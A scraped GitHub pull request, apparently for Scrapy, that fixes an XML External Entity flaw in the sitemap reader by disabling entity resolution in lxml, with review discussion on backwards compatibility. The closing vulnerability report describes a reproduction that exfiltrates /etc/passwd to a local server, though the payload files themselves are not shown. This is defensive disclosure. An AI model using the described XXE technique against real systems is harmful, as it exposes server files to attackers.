Fixed XXE flaw in sitemap reader #676
Conversation
oooh, seriuos bug! is it the same for scrapy.selector.Selector on XMLResponses? |
I wonder if we should use https://pypi.python.org/pypi/defusedxml#defusedxml-lxml |
@csalazar are you going to update the PR with fixes for the other Selector? Do you mind adding a testcase specially for LxmlDocument class? defusedxml looks good but it may require more work to integrate it, in the other hand resolve_entities=False looks quick enough to be merged soon. |
|
||
class SafeXMLParser(etree.XMLParser): | ||
def __init__(self, *args, **kwargs): | ||
super(SafeXMLParser, self).__init__(*args, resolve_entities=False, **kwargs) |
dangra
Apr 4, 2014
Member
I prefer to set resolve_entities
using kwargs.setdefault()
if this class is meant to be public.
I prefer to set resolve_entities
using kwargs.setdefault()
if this class is meant to be public.
csalazar
Apr 4, 2014
Author
Contributor
Yes, that seems better, I've updated the method.
Yes, that seems better, I've updated the method.
LGTM, It deserves a hotfix release |
Is it expanding entities like |
No, no entities expanded. |
Fixed XXE flaw in sitemap reader
I wonder if we can expand standard entities but disallow custom entities. This change fixes the security issue, so it is good to merge it, but is is backwards incompatible for XML selectors. |
Hi @kmike, I think that a valid XML file shows raw version of standard entities and not their html encoding. If you have an example, please paste it since we have to check if it breaks the XML document too. |
I was asking about predefined XML entities like |
The XML reader, used by SitemapSpider to process XML sitemaps, is vulnerable to an XML External Entity (XXE) attack. The code to reproduce the bug is displayed below.
test.py
malicious_sitemap.xml
As result, the contents of /etc/passwd are sent to the server http://127.0.0.1:8000/ as part of the URL path.